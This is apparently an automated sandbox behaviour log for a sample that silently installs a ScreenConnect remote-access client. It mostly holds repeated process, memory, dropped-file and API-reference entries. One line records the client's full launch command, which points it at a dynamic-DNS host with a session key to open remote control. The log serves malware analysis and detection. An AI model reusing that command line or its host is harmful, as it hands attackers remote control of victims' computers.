                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 6940000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 6020000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 7940000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 8940000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: 8BC0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1A50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMemory allocated: 1890000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1ABF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMemory allocated: 1B0D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEC9F.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE7EB.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Users\user\Desktop\file.exe TID: 6368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe TID: 2620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: 5de52b.msi.3.drBinary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.3389372238.000000000100D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.file.exe.30a0000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.0.file.exe.a263d8.4.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&c=traffic%20test&c=&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
